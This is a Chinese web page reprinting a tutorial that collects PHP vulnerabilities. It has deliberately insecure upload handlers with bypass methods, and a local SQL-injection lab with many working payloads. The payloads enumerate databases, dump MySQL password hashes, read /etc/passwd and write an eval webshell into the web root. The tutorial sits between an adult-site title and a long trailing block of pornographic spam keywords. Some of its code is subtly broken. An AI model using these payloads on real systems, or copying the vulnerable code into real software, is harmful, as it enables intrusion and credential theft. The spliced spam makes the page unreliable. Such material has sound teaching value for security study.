成人怡红院-成人怡红院视频在线观看-成人影视大全-成人影院203nnxyz-美女毛片在线看-美女免费黄

站長資訊網
最全最豐富的資訊網站

非常全面!PHP常見漏洞代碼總結!

本篇文章給大家帶來了關于PHP漏洞的相關知識,其中主要給大家總結介紹PHP的常見漏洞代碼都有哪些,非常全面詳細,下面一起來看一下,希望對需要的朋友有所幫助。

非常全面!PHP常見漏洞代碼總結!

漏洞總結

PHP 文件上傳漏洞

只驗證MIME類型: 代碼中驗證了上傳的MIME類型,繞過方式使用Burp抓包,將上傳的一句話小馬*.php中的Content-Type:application/php,修改成Content-Type: image/png然后上傳.

<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./");  if(isset($_POST['submit'])) { if(file_exists(UPLOAD_PATH)) { // 判斷 content-type 的類型,如果是image/png則通過 if($_FILES['upload_file']['type'] == 'image/png') { $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']; if (move_uploaded_file($temp_file, $img_path)) echo "上傳完成."; else echo "上傳出錯."; } } } ?>  <body> <form enctype="multipart/form-data" method="post">         <input type="file" name="upload_file">         <input type="submit" name="submit" value="上傳">     </form> </body>
登錄后復制

白名單的繞過: 白名單就是允許上傳某種類型的文件,該方式比較安全,抓包上傳php后門,然后將文件名改為.jpg即可上傳成功,但是有時候上傳后的文件會失效無法拿到Shell.

<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./");  if(isset($_POST['submit'])) { if(file_exists(UPLOAD_PATH)) { $allow_ext = array(".jpg",".png",".jpeg");  $file_name = trim($_FILES['upload_file']['name']); // 取出文件名 $file_ext = strrchr($file_name, '.'); $file_ext = str_ireplace('::$DATA', '', $file_ext); //去除字符串::$DATA $file_ext = strtolower($file_ext);                  // 轉換為小寫 $file_ext = trim($file_ext);                        // 首尾去空  if(in_array($file_ext, $allow_ext)) { $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext; if (move_uploaded_file($temp_file,$img_path)) echo "上傳完成: {$img_path} <br>"; else echo "上傳失敗 <br>"; } } } ?>  <body> <form enctype="multipart/form-data" method="post">         <input type="file" name="upload_file">         <input type="submit" name="submit" value="上傳">     </form> </body>
登錄后復制

白名單驗證文件頭: 本關主要是允許jpg/png/gif這三種文件的傳輸,且代碼中檢測了文件頭的2字節內容,我們只需要將文件的頭兩個字節修改為圖片的格式就可以繞過.

通常JPEG/JPG: FF D8 | PNG:89 50 | GIF:47 49 以JPEG為例,我們在一句話木馬的開頭添加兩個11也就是二進制的3131,然后將.php修改為.jpg,使用Brup抓包發送到Repeater模塊,將HEX編碼3131改為FFD8點Send后成功上傳JPG.

<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./");  function getReailFileType($filename) {     $file = fopen($filename, "rb");     $bin = fread($file, 2);     fclose($file);     $strInfo = @unpack("C2chars", $bin);         $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);         $fileType = '';         switch($typeCode)     {               case 255216: $fileType = 'jpg'; break;         case 13780:  $fileType = 'png'; break;                 case 7173:   $fileType = 'gif'; break;         default:     $fileType = 'unknown';         }             return $fileType; }  if(isset($_POST['submit'])) { if(file_exists(UPLOAD_PATH)) { $temp_file = $_FILES['upload_file']['tmp_name'];      $file_type = getReailFileType($temp_file);       if($file_type == 'unknown')       {         echo "上傳失敗 <br>";     }else     {         $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;         if(move_uploaded_file($temp_file,$img_path))          echo "上傳完成 <br>";     } } } ?>  <body> <form enctype="multipart/form-data" method="post">         <input type="file" name="upload_file">         <input type="submit" name="submit" value="上傳">     </form> </body>
登錄后復制

繞過檢測文件頭: 這種方式是通過文件頭部起始位置進行匹配的從而判斷是否上傳,我們可以通過在上傳文件前面追加合法的文件頭進行繞過,例如在文件開頭部位加上GIF89a<?php phpinfo();?>即可完成繞過,或者如果是xffxd8xff我們需要在文件開頭先寫上%ff%d8%ff<?php phpinfo(); ?>然后,選擇特殊字符,右擊CONVERT->URL->URL-Decode編碼后釋放.

<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./");  function getReailFileType($filename) {     $fh = fopen($filename, "rb");     if($fh)     {      $bytes = fread($fh,6);      fclose($fh);      if(substr($bytes,0,3) == "xffxd8xff" or substr($bytes,0,3)=="x3fx3fx3f"){      return "image/jpeg";      }      if($bytes == "x89PNGx0dx0a"){      return "image/png";      }      if($bytes == "GIF87a" or $bytes == "GIF89a"){      return "image/gif";      }     }     return 'unknown'; }  if(isset($_POST['submit'])) { if(file_exists(UPLOAD_PATH)) { $temp_file = $_FILES['upload_file']['tmp_name'];      $file_type = getReailFileType($temp_file);      echo "狀態: {$file_type} ";       if($file_type == 'unknown')       {         echo "上傳失敗 <br>";     }else     {      $file_name = $_FILES['upload_file']['name'];      $img_path = UPLOAD_PATH . "/" . $file_name;         if(move_uploaded_file($temp_file,$img_path))          echo "上傳 {$img_path} 完成 <br>";     } } } ?>  <body> <form enctype="multipart/form-data" method="post">         <input type="file" name="upload_file">         <input type="submit" name="submit" value="上傳">     </form> </body>
登錄后復制

圖像檢測繞過: 通過使用圖像函數,檢測文件是否為圖像,如需上傳則需要保持圖像的完整性,所以無法通過追加文件頭的方式繞過,需要制作圖片木馬上傳.

針對這種上傳方式的繞過我們可以將圖片與FIG文件合并在一起copy /b pic.gif+shell.php 1.php上傳即可繞過.

<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./");  function getReailFileType($filename) { // 檢查是否為圖像 if(@getimagesize($filename)) { if(@imagecreatefromgif($filename)){ return "image/gif"; } if(@imagecreatefrompng($filename)){ return "image/png"; } if(@imagecreatefromjpeg($filename)){ return "image/jpeg"; } }     return 'unknown'; }  if(isset($_POST['submit'])) { if(file_exists(UPLOAD_PATH)) { $temp_file = $_FILES['upload_file']['tmp_name'];      $file_type = getReailFileType($temp_file);      echo "狀態: {$file_type} ";       if($file_type == 'unknown')       {         echo "上傳失敗 <br>";     }else     {      $file_name = $_FILES['upload_file']['name'];      $img_path = UPLOAD_PATH . "/" . $file_name;         if(move_uploaded_file($temp_file,$img_path))          echo "上傳 {$img_path} 完成 <br>";     } } } ?>  <body> <form enctype="multipart/form-data" method="post">         <input type="file" name="upload_file">         <input type="submit" name="submit" value="上傳">     </form> </body>
登錄后復制

上傳條件競爭: 這里是條件競爭,先將文件上傳到服務器,然后判斷文件后綴是否在白名單里,如果在則重命名,否則刪除,因此我們可以上傳1.php只需要在它刪除之前訪問即可,可以利用burp的intruder模塊不斷上傳,然后我們不斷的訪問刷新該地址即可

<?php header("Content-type: text/html;charset=utf-8"); define("UPLOAD_PATH", "./");  if(isset($_POST['submit'])) { $ext_arr = array('jpg','png','gif');     $file_name = $_FILES['upload_file']['name'];     $temp_file = $_FILES['upload_file']['tmp_name'];     $file_ext = substr($file_name,strrpos($file_name,".")+1);     $upload_file = UPLOAD_PATH . '/' . $file_name;      if(move_uploaded_file($temp_file, $upload_file))     {      if(in_array($file_ext, $ext_arr))      {      $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;              rename($upload_file, $img_path);              echo "上傳完成. <br>";      }else      {      unlink($upload_file);      echo "上傳失敗. <br>";      }     } } ?>  <body> <form enctype="multipart/form-data" method="post">         <input type="file" name="upload_file">         <input type="submit" name="submit" value="上傳">     </form> </body>
登錄后復制

PHP 注入漏洞

基本查詢語句

搭建SQL注入演練環境,首先確保MySQL版本為MySQL 5.7以上,并導入下方的數據庫腳本自動創建相應的數據庫文件.

drop database if exists lyshark; create database lyshark; use lyshark; drop table if exists local_user; create table local_user( id int(10) primary key not null, username varchar(100) not null, password varchar(100) not null, usremail varchar(100) not null, usertype int(1) default 0 ); alert table local_user character set utf8; insert into lyshark.local_user(id,username,password,usremail) VALUES(1,"admin",md5("123123"),"admin@163.com"), (2,"lyshark",md5("adsdfw2345"),"lyshark@163.com"),(3,"guest",md5("12345678"),"guest@126.com"), (4,"Dumb",md5("458322456"),"Dumb@blib.com"),(5,"Angelina",md5("GIs92834"),"angelina@mkic.com"), (6,"Dummy",md5("HIQWu28934"),"dummy@cboos.com"),(7,"batman",md5("suw&*("),"batmain@gmail.com"), (8,"dhakkan",md5("swui16834"),"dhakakan@umail.com"),(9,"nacki",md5("fsie92*("),"cbooks@emial.com"), (10,"wuhaxp",md5("sadwq"),"cookiec@345.com"),(11,"cpiwu",md5("sadwq"),"myaccce@345.com");
登錄后復制

接著安裝好PHP7.0或以上版本的環境,并創建index.php文件,寫入以下測試代碼,數據庫密碼請自行修改.

<!DOCTYPE html> <html> <head>     <meta charset="utf8">     <title>SQL 注入測試代碼</title> </head> <?php header("Content-type: text/html;charset=utf8"); $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) {     $id = $_GET['id'];     if(isset($id))     {             $sql = "select * from local_user where id='$id' limit 0,1";             $query = mysqli_query($connect,$sql);             if($query)              $row = mysqli_fetch_array($query);     } } ?> <body> <table border="1">    <tr>     <th>序號</th><th>用戶賬號</th><th>用戶密碼</th><th>用戶郵箱</th><th>權限</th>    </tr>    <tr>           <td><?php echo $row['id']; ?></td>           <td><?php echo $row['username']; ?></td>           <td><?php echo $row['password']; ?></td>           <td><?php echo $row['usremail']; ?></td>           <td><?php echo $row['usertype']; ?></td>    </tr> </table><br> <?php echo '<hr><b> 后端執行SQL語句:  </b>' . $sql;  ?> </body> </html>
登錄后復制

Union 查詢字段個數: Union可以用于一個或多個SELECT的結果集,但是他有一個條件,就是兩個select查詢語句的查詢必須要有相同的列才可以執行,利用這個特性我們可以進行對比查詢,也就是說當我們union select的列與它查詢的列相同時,頁面返回正常.

首先我們猜測,當前字段數為4的時候頁面無返回,也就說明表字段數必然是大于4的,接著增加一個字段,查詢1,2,3,4,5時頁面顯示正常,說明表結構是5個字段的.

index.php?id=1' and 1=0 union select 1,2,3,4 --+  index.php?id=1' and 1=0 union select 1,2,3,4,5 --+ index.php?id=1' and 1=0 union select null,null,null,null,null --+
登錄后復制

Order By查詢字段個數: 在SQL語句中是對結果集的指定列進行排序,比如我們想讓結果集按照第一列排序就是order by 1按照第二列排序order by 2依次類推,按照這個原理我們來判斷他的字段數,如果我們按照第1列進行排序數據庫會返回正常,但是當我們按照第100列排序,因為數據庫中并不存在第100列,從而報錯或無法正常顯示.

首先我們猜測數據庫有6個字段,嘗試根據第6行進行排序發現數據無法顯示,說明是小于6的,我們繼續使用5測試,此時返回了結果.

index.php?id=1' and 1 order by 6 --+ index.php?id=1' and 1 order by 5 --+
登錄后復制

大部分程序只會調用數據庫查詢的第一條語句進行查詢然后返回,如果想看到的數據是在第二條語句中,如果我們想看到我們想要的數據有兩種方法,第一種是讓第一條數據返回假,第二種是通過sql語句直接返回我們想要的數據.

第一種我們讓第一個查詢的結果始終為假,通過使用and 0來實現,或者通過limit語句,limit在mysql中是用來分頁的,通過他可以從查詢出來的數據中獲取我們想要的數據.

index.php?id=1' and 0 union select null,null,null,null,null --+ index.php?id=1' and 0 union select null,version(),null,null,null --+  index.php?id=1' union select null,null,null,null,null limit 1,1 --+ index.php?id=1' union select null,version(),null,null,null limit 1,1 --+
登錄后復制

查全部數據庫名稱: MySQL默認將所有表數據放入information_schema.schemata這個表中進行存儲,我們可以查詢這個表中的數據從而找出當前系統中所有的數據庫名稱,通過控制limit中的參數即可爆出所有數據庫.

index.php?id=1' and 0 union select 1,1,database(),1,1 --+  index.php?id=1' and 0 union select 1,2,3,4,schema_name from information_schema.schemata limit 0,1 --+ index.php?id=1' and 0 union select 1,2,3,4,schema_name from information_schema.schemata limit 1,1 --+ index.php?id=1' and 0 union select 1,2,3,4,schema_name from information_schema.schemata limit 2,1 --+
登錄后復制

查詢表中名稱: 通過使用group_concat可以返回查詢的所有結果,因為我們需要通過命名判斷該我們需要的敏感數據.

# 通過 limit 限定條件每次只輸出一個表名稱  index.php?id=1' and 0 union select 1,2,3,4,table_name from information_schema.tables where table_schema='lyshark' limit 0,1 --+  index.php?id=1' and 0 union select 1,2,3,4,table_name from information_schema.tables where table_schema='lyshark' limit 1,1 --+  # 通過 concat 函數一次性輸出所有表 index.php?id=1' and 0 union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema='lyshark' --+
登錄后復制

查詢表中字段: 通過使用table_schema和table_name指定查詢條件,即可查詢到表中字段與數據.

# 查詢出lyshark數據庫local_user表中的,所有字段 index.php?id=1' and 0 union select 1,2,3,4,group_concat(column_name) from information_schema.columns >              where table_schema='lyshark' and table_name='local_user' --+  # 每次讀取出一個表中字段,使用limit進行遍歷 index.php?id=1' and 0 union select 1,2,3,4,column_name from information_schema.columns >              where table_schema='lyshark' and table_name='local_user' limit 0,1 --+  index.php?id=1' and 0 union select 1,2,3,4,column_name from information_schema.columns >              where table_schema='lyshark' and table_name='local_user' limit 1,1 --+
登錄后復制

查詢表中數據: 通過上面的語句我們可以確定數據庫名稱,數據表,以及表中字段名稱,接著可以進行讀取表中數據.

index.php?id=1' and 0 union select 1,Host,Password,4,5 from mysql.user limit 0,1--+ index.php?id=1' and 0 union select 1,Host,Password,4,5 from mysql.user limit 1,1--+ index.php?id=1' and 0 union select 1,2,3,group_concat(id,username),5 from lyshark.users --+
登錄后復制

常用的查詢語句: 除此以外,我們還可以使用以下常用判斷條件的配合實現對數據庫其他權限的進一步注入.

# ----------------------------------------------------------------------------------- # 判斷注入點: 注入點的判斷有多種形式,我們可以通過提交and/or/+-等符號來判斷.  index.php?id=1' and 1=1 --+    # 提交and判斷注入 index.php?id=1' and 1=0 --+ index.php?id=1%2b1             # 提交加號判斷注入 index.php?id=2-1               # 提交減號判斷注入 index.php?id=1 and sleep(5)    # 延時判斷諸如點  # ----------------------------------------------------------------------------------- # 判斷ROOT權限: 判斷數據庫是否具有ROOT權限,如果返回了查詢結果說明具有權限. index.php?id=1' and ord(mid(user(),1,1)) = 114 --+  # ----------------------------------------------------------------------------------- # 判斷權限大小: 如果結果返回正常,說明具有讀寫權限,如果返回錯誤應該是管理員給數據庫帳戶降權了. index.php?id=1' and(select count(*) from mysql.user) > 0  # ----------------------------------------------------------------------------------- # 查詢管理密碼: 查詢MySQL的管理密碼,這里的#末尾警號,是注釋符的意思,說明后面的都是注釋. index.php?id=1' and 0 union select 1,host,user,password,5 from mysql.user --+                // 5.6以前版本 index.php?id=1' and 0 union select 1,host,user,authentication_string,5 from mysql.user --+   // 5.7以后版本  # ----------------------------------------------------------------------------------- # 向主站寫入一句話: 可以寫入一句話后門,但在linux系統上目錄必須具有讀寫和執行權限. index.php?id=1' and 0 union select 1,load_file("/etc/passwd"),3,4,5 --+ index.php?id=1' union select 1,load_file("/etc/passwd"),3,4,5 into outfile '/var/www/html/a.txt'--+ index.php?id=1' union select 1,"<?php phpinfo();?>",3,4,5 into outfile '/var/www/html/shell.php' --+ index.php?id=1' union select 1,2,3,4,load_file(char(11,116,46,105,110,105)) into outfile '/var/www/html/b.txt' --+  # ----------------------------------------------------------------------------------- # 利用MySQL引擎寫一句話: 通過使用MySQL的存儲引擎,以MySQL身份寫入一句話 create table shell(cmd text); insert into shell(cmd) values('<?php @eval($_POST[cmd]) ?>'); select cmd from shell into outfile('/var/www/html/eval.php');  # ----------------------------------------------------------------------------------- # 常用判斷語句: 下面是一些常用的注入查詢語句,包括查詢主機名等敏感操作. index.php?id=1' union select 1,1,load_file("/etc/passwd")       // 加載指定文件 index.php?id=1' union select 1,1,@@datadir                      // 判斷數據庫目錄 index.php?id=1' union select 1,1,@@basedir                      // 判斷安裝根路徑 index.php?id=1' union select 1,1,@@hostname                     // 判斷主機名 index.php?id=1' union select 1,1,@@version                      // 判斷數據庫版本 index.php?id=1' union select 1,1,@@version_compile_os           // 判斷系統類型(Linux) index.php?id=1' union select 1,1,@@version_compile_machine      // 判斷系統體系(x86) index.php?id=1' union select 1,1,user()                         // 曝出系統用戶 index.php?id=1' union select 1,1,database()                     // 曝出當前數據庫
登錄后復制

GET 注入

簡單的注入測試: 本關中沒有對代碼進行任何的過濾.

<!DOCTYPE html> <html> <head>     <meta charset="utf8">     <title>SQL 注入測試代碼</title> </head> <body> <?php function getCurrentUrl() {     $scheme = $_SERVER['REQUEST_SCHEME'];   // 協議     $domain = $_SERVER['HTTP_HOST'];        // 域名     $requestUri = $_SERVER['REQUEST_URI'];  // 請求參數     $currentUrl = $scheme . "://" . $domain . $requestUri;     return urldecode($currentUrl); } ?> <?php header("Content-type: text/html;charset=utf8"); $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) {     $id = $_GET['id'];     if(isset($id))     {         $sql = "select username,password from local_user where id='$id' limit 0,1";         $query = mysqli_query($connect,$sql);         if($query)         {          $row = mysqli_fetch_array($query);          if($row) {    echo "<font size='5'>";    echo "賬號: {$row['username']} <br>";    echo "密碼: {$row['password']} <br>";    echo "</font>";    echo "后端執行語句: {$sql} <br>";    $URL = getCurrentUrl();    echo "后端URL參數: {$URL} <br>";    } else  { echo "后端執行語句: {$sql} <br>"; print_r(mysql_error()); }         }     } } ?> </body> </html>
登錄后復制

SQL語句沒有經過任何過濾,或者是過濾不嚴格,會導致注入的發生.

--------------------------------------------------------------------------------- $sql = "select username,password from local_user where id=$id limit 0,1"; http://127.0.0.1/index.php?id=-1 union select 1,version() --+  $sql = "select username,password from local_user where id=($id) limit 0,1"; http://127.0.0.1/index.php?id=-1) union select 1,version() --+ http://127.0.0.1/index.php?id=1) and 1 =(0) union select 1,version() --+  --------------------------------------------------------------------------------- $sql = "select username,password from local_user where id='$id' limit 0,1"; http://127.0.0.1/index.php?id=-1 union select 1,version() --+  $sql = "select username,password from local_user where id=('$id') limit 0,1"; http://127.0.0.1/index.php?id=-1') union select 1,version() --+ http://127.0.0.1/index.php?id=1') and '1'=('0') union select 1,version() --+  $sql = "select username,password from local_user where id=(('$id')) limit 0,1"; http://127.0.0.1/index.php?id=-1')) union select 1,version() --+  --------------------------------------------------------------------------------- $id = '"' . $id . "'"; $sql = "select username,password from local_user where id=($id) limit 0,1";  http://127.0.0.1/index.php?id=-1") union select 1,version() --+ http://127.0.0.1/index.php?id=1") and "1"=("0") union select 1,version() --+
登錄后復制

POST 輸入框注入:

<!DOCTYPE html> <html> <head>     <meta charset="utf8"> </head> <body> <form action="" method="post"> 賬號: <input style="width:1000px;height:20px;" type="text"  name="uname" value=""/><br> 密碼: <input  style="width:1000px;height:20px;" type="password" name="passwd" value=""/> <input type="submit" name="submit" value="提交表單" /> </form> <?php header("Content-type: text/html;charset=utf8"); $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) { $uname=$_POST['uname']; $passwd=$_POST['passwd']; $passwd = md5($passwd);      if(isset($_POST['uname']) && isset($_POST['passwd']))     {         $sql="select username,password FROM local_user WHERE username='$uname' and password='$passwd' LIMIT 0,1";         $query = mysqli_query($connect,$sql);         if($query)         {          $row = mysqli_fetch_array($query);          if($row)          {          echo "<br>歡迎用戶: {$row['username']} 密碼: {$row['password']} <br><br>";          echo "后端執行語句: {$sql} <br>";          }          else          {          echo "<br>后端執行語句: {$sql} <br>";          }         }     } } ?> </body> </html>
登錄后復制

簡單的進行查詢測試,此處的查詢語句沒有經過任何的過濾限制,所以呢你可以直接脫褲子了.

# --------------------------------------------------------------------------------------------------------- # SQL語句 $sql="select username,password FROM local_user WHERE username='$uname' and password='$passwd' LIMIT 0,1"; # ---------------------------------------------------------------------------------------------------------  # 爆出字段數 admin' order by 1 # admin' order by 2 --  admin' and 1 union select 1,2,3 # admin' and 1 union select 1,2 #  # 爆出數據庫 admin ' and 0 union select null,database() # admin' and 0 union select 1,version() #  # 爆出所有表名稱(需要注意數據庫編碼格式) set character_set_database=utf8; set collation_database= utf8_general_ci alter table local_user convert to character set utf8;  ' union select null,table_name from information_schema.tables where table_schema='lyshark' limit 0,1 # ' union select null,table_name from information_schema.tables where table_schema='lyshark' limit 1,1 #  # 爆出表中字段 ' union select null,column_name from information_schema.columns where table_name='local_user' limit 0,1 # ' union select null,column_name from information_schema.columns where table_name='local_user' limit 1,1 #  # 繼續爆出所有的用戶名密碼 ' union select null,group_concat(username,0x3a,password) from local_user #  # --------------------------------------------------------------------------------------------------------- # 雙注入-字符型 # 此類注入很簡單,只需要閉合前面的")而后面則使用#注釋掉即可 $uname = '"' .  $uname . '"'; $passwd = '"' . $passwd . '"'; $sql="select username,password FROM local_user WHERE username=($uname) and password=($passwd) LIMIT 0,1";  #payload admin") order by 2 # admin") and 0 union select 1,version() # admin") and 0 union select 1,database() #  # --------------------------------------------------------------------------------------------------------- # POST型的-雙注入 #  $uname = '"' .  $uname . '"'; $passwd = '"' . $passwd . '"'; $sql="select username,password FROM local_user WHERE username=$uname and password=$passwd LIMIT 0,1";  admin" and 0 union select 1,version() #
登錄后復制

Usage-Agent 注入: Usagen-Agent是客戶請求時攜帶的請求頭,該頭部是客戶端可控,如果有帶入數據庫的相關操作,則可能會產生SQL注入問題.

建庫> create table User_Agent(u_name varchar(20),u_addr varchar(20),u_agent varchar(256));  <!DOCTYPE html> <html> <head>     <meta charset="utf8">     <title>SQL 注入測試代碼</title> </head> <body> <form action="" method="post"> 賬號: <input style="width:1000px;height:20px;" type="text"  name="uname" value=""/><br> 密碼: <input  style="width:1000px;height:20px;" type="password" name="passwd" value=""/> <input type="submit" name="submit" value="Submit" /> </form> <?php header("Content-type: text/html;charset=utf8"); error_reporting(0); $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) {     if(isset($_POST['uname']) && isset($_POST['passwd']))     { $uname=$_POST['uname']; $passwd=$_POST['passwd']; $passwd = md5($passwd);          $sql="select username,password FROM local_user WHERE username='$uname' and password='$passwd' LIMIT 0,1";         $query = mysqli_query($connect,$sql);         if($query)         {          $row = mysqli_fetch_array($query);          if($row)          {          // 獲取到用戶的Agent客戶請求體          $Uagent = $_SERVER['HTTP_USER_AGENT']; // REMOTE_ADDR 是調用的底層的會話ip地址,理論上是不可以偽造的 $IP = $_SERVER['REMOTE_ADDR'];  echo "<br>歡迎用戶: {$row['username']} 密碼: {$row['password']} <br><br>"; echo "您的IP地址是: {$IP} <br>";  $insert_sql = "insert into User_Agent(u_name,u_addr,u_agent) values('$uname','$IP','$Uagent')"; mysqli_query($connect,$insert_sql); echo "User_Agent請求頭: {$Uagent} <br>";          }         }     } } ?> </body> </html>
登錄后復制

首先我們通過burp提交登錄請求,然后再登陸時,修改agent請求頭,讓其帶入數據庫查詢.

POST /post.php HTTP/1.1 Host: 192.168.1.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  uname=admin&passwd=123123&submit=Submit
登錄后復制

修改agent驗證,可被繞過,此處的語句帶入數據庫變為了insert into User_Agent values('1)','u_addr','u_agent')有時,不存在回顯的地方即使存在注入也無法得到結果,但卻是一個安全隱患,需要引起重視.

User-Agent: 1',1,1)# uname=admin&passwd=123123&submit=Submit  User-Agent: 1',1,updatexml(1,concat(0x3a,database(),0x3a),1)a)#)# uname=admin&passwd=123123&submit=Submit
登錄后復制

Cookie 注入: 該注入的產生原因是因為程序員沒有將COOKIE進行合法化檢測,并將其代入到了數據庫中查詢了且查詢變量是可控的,當用戶登錄成功后會產生COOKIE,每次頁面刷新后端都會拿著這個COOKIE帶入數據庫查找,這是非常危險的.

<!DOCTYPE html> <html> <head>     <meta charset="utf8"> </head> <body> <form action="" method="post"> 賬號: <input type="text"  name="uname" value=""/><br> 密碼: <input type="password" name="passwd" value=""/> <input type="submit" name="submit" value="Submit" /> </form> <?php header("Content-type: text/html;charset=utf8"); error_reporting(0); $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) { $cookee = $_COOKIE['uname']; if($cookee) { $sql="SELECT username,password FROM local_user WHERE username='$cookee' LIMIT 0,1"; $query = mysqli_query($connect,$sql); echo "執行SQL: " . $sql . "<br>"; if($query) { $row = mysqli_fetch_array($query); if($row) { echo "<br> COOKIE 已登錄 <br>"; echo "您的賬號: " . $row['username'] . "<br>"; echo "您的密碼: " . $row['password'] . "<br>"; } } }     if(isset($_POST['uname']) && isset($_POST['passwd']))     { $uname=$_POST['uname']; $passwd=$_POST['passwd']; $passwd = md5($passwd); $sql="select username,password FROM local_user WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $query = mysqli_query($connect,$sql);         if($query)         {          $row = mysqli_fetch_array($query);          $cookee = $row['username'];          if($row)          {          setcookie('uname', $cookee, time() + 3600);          $format = 'D d M Y - H:i:s';          $timestamp = time() + 3600;          echo "COOKIE已設置: " . date($format, $timestamp);          }         }     } } ?> </body> </html>
登錄后復制

以下是注入Payload語句,當登陸成功后,抓包然后刷新頁面,然后構造惡意的登錄COOKIE,即可實現利用.

Cookie: uname=admin' and 0 union select database(),2--+ Cookie: uname=admin' and 0 union select version(),2--+
登錄后復制

update-xml注入:

<!DOCTYPE html> <html> <head>     <meta charset="utf8">     <title>SQL 注入測試代碼</title> </head> <body> <form action="" method="post"> 賬號: <input style="width:1000px;height:20px;" type="text"  name="uname" value=""/><br> 密碼: <input  style="width:1000px;height:20px;" type="password" name="passwd" value=""/> <input type="submit" name="submit" value="提交表單" /> </form> <?php error_reporting(0); header("Content-type: text/html;charset=utf8"); function Check($value) { if(!empty($value)) { // 如果結果不為空,則取出其前十五個字符 18 $value = substr($value,0,15); } // 當magic_quotes_gpc=On的時候,函數get_magic_quotes_gpc()就會返回1 // 當magic_quotes_gpc=Off的時候,函數get_magic_quotes_gpc()就會返回0 if(get_magic_quotes_gpc()) { // 刪除由 addslashes() 函數添加的反斜杠 $value = stripslashes($value); } if(!ctype_digit($value)) { // ctype_digit()判斷是不是數字,是數字就返回true,否則返回false // mysql_real_escape_string()轉義 SQL 語句中使用的字符串中的特殊字符。 $value = "'" . mysql_real_escape_string($value) . "."; } else $value = intval($value); return $value; } $connect = mysqli_connect("localhost","root","12345678","lyshark"); if($connect) {     if(isset($_POST['uname']) && isset($_POST['passwd']))     {      $uname=Check($_POST['uname']); $passwd=$_POST['passwd']; $passwd = md5($passwd);         $sql="select username,password FROM local_user WHERE username=$uname LIMIT 0,1";         $query = mysqli_query($connect,$sql);         if($query)         {          $row = mysqli_fetch_array($query);          if($row)          {          $rows = $row['username'];          $udate = "UPDATE local_user SET password = '$passwd' WHERE username='$rows'";          mysql_query($update);          if(mysql_error())          {          print_r(mysql_error());          }          echo "后端執行語句: {$sql} <br>";          }          else          {          echo "<br>后端執行語句: {$sql} <br>";          }         }     } } ?> </body> </html>
登錄后復制

推薦學習:《PHP視頻教程》

贊(0)
分享到: 更多 (0)
?
網站地圖   滬ICP備18035694號-2    滬公網安備31011702889846號
人人妻人人澡人人乐DVD| 日韩欧美一区二区三区视频| 欧美性猛烈XXXX极品少妇| 欧洲美熟女乱又伦AV影片| 日本无人区码一码二码三码四码| 少妇人妻无码永久免费视频| 亚洲AⅤ日韩久久久久久| 亚洲人成人无码www五月婷| 一本无码中文字幕在线观| 99RE6在线视频精品免费下载| AV无码人妻无码男人的天堂| 高潮喷吹一区二区在线观看| 国产嫖妓风韵犹存对白| 久久精品国产99国产精品导航 | 性──交──性──乱| 亚洲欧洲日韩综合色天使| 中文字日产幕码三区的做法大全| 八戒电影电影网电影网| 国产精品18久久久久久欧美| 精品国产成人一区二区| 妺妺窝人体色www免费看| 人人爽天天碰狠狠添| 五十路丰满中年熟女中出| 亚洲色帝国综合婷婷久久| 99无码熟妇丰满人妻啪啪| 国产97色在线 | 欧洲| 黄 色 视 频 在 线 免费观| 免费的看片APP| 色偷偷色噜噜狠狠网站30根| 亚洲成A人片在线播放| 2021最新国产在线人成| 国产成人精品人人2020视频| 精品人妻少妇敕草AV无码专区 | A级毛片成人网站免费看| 国产成人综合精品无码| 久久久久久亚洲精品不卡| 日本成熟少妇喷浆在线观看| 亚洲AV无码男人的天堂 | 麻豆果冻视频传媒APP下载| 色狠狠色噜噜AV综合五区| 亚洲精品无码专区在线观看| WWW国产精品内射老熟女| 国产欧美日韩精品丝袜高跟鞋| 久久香港三级台湾三级播放| 色一情一区二区三区四区| 亚洲欧洲无码一区二区三区| 把她送上一个又一个巅峰| 好爽好紧好大的免费视频国产| 欧美VIDEOS另类色HDFR| 性色a∨精品高清在线观看| 2021国产麻豆剧传媒在线| 国产精品无码久久久久| 男朋友想吻我腿中间那个部位 | 少妇内射一区27p| 野花韩国高清免费神马| 丰满妇女强高潮18ⅩXXXHD| 久久人爽人人爽人人片AV | 绯色AV一区二区三区在线高清| 久久精品中文字幕有码| 沈陽43歲熟女高潮視頻| 中文精品久久久久国产网址| 国产乱码精品一区二区三区四川人| 免费一看一级毛片少妇丰满2| 午夜理论片YY44880影院| CHINA浴室洗澡VOYEUR| 激情影院内射美女| 色婷婷亚洲精品综合影院| 真人无码作爱免费视频网站| 国产精品色内内在线播放| 欧美XXXX做受欧美.88| 亚洲国产精品无码久久| 俄罗斯18XXOO在线| 免费观看亚洲人成网站| 亚洲成AV人片一区二区| 丰满老熟妇好大BBBBB四P| 男女后进式猛烈XX00动态图| 亚洲国产精品一区二区成人片国内 | 成人国内精品久久久久影院| 久久天天躁拫拫躁夜夜AV| 无码熟妇人妻AV在线网站| XXXCHINESE国产HD| 久久中文骚妇内射| 亚洲AV色香蕉一区二区三区夜夜嗨 | 一区二区无码在线视频| 国产又大又黑又粗免费视频 | 无码国产色欲XXXXX视频| АⅤ天堂中文在线网官网| 老阿姨哔哩哔哩B站肉片入口6| 亚洲AV丰满熟妇一区| 丰满少妇高潮在线播放不卡| 欧美乱妇高清无乱码免费| 